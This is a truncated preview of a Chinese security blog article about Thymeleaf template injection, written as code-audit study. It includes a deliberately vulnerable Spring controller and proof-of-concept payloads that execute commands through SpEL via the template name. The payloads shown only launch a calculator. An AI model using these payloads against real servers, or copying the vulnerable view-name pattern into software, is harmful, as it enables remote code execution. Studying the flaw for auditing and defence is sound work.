Thymeleaf模板注入还能打吗？

XG小刚 · 公众号 · · 2024-09-01 09:53

文章预览

拍摄于:烟台大学小树林 Thymeleaf模板注入最近在研究代码审计，顺便学到了Thymeleaf模板注入本文主要分析Thymeleaf模板注入的利用和修复，以及各版本的修复方式和绕过方式 Html文件利用这是目前最常见的利用方式 html> ${} 里面的内容其实是执行的SPEL表达式后续版本Thymeleaf 添加了沙箱防护机制，限制了一些黑名单类 TemplateName利用在Thymeleaf 3.0.0 至 3.0.11 版本存在该漏洞 @Controller publicclassThymeleafDemoController{ @GetMapping("/path") publicString path(String path){ return"user/"+ path +"/welcome"; } } 利用poc path=__${6*6}__:: path=__${T(Runtime).getRuntime().exec("open -a calculator.app")}__:: 具体原理就是使用Thymeleaf进行渲染是调用的 ThymeleafView.render() 函数然后调用的 renderFragment() 函数进行渲染此时templateName是return回来的值将 templateName 赋值给 viewTemplateName 然后 ………………………………

原文地址：访问原文地址
快照地址：访问文章快照
总结与预览地址：访问总结与预览

分享到微博

推荐文章

白鲸出海 · GTC2024 第二日：AI+与DTC品牌出海，交出了怎样的年末答卷？

22 小时前

阿里云开发者 · 突破T-SQL限制：利用CLR集成扩展RDS SQL Server的功能边界

昨天

白鲸出海 · 跨境出海行业风向标诞生 | 第六届鲸鸣奖获奖名单正式揭晓

昨天

白鲸出海 · TikTok达成图片版权合作，腾讯旗下公司计划以12亿美元收购益智游戏厂商Easybrain | 一句话看出海新鲜事

6 天前

半导体行业观察 · 深耕SAW三年，锐石创芯实现新突破

2 月前

萝严肃 · 黄晓明传再婚，霸总的爱情又是同样的剧情

2 月前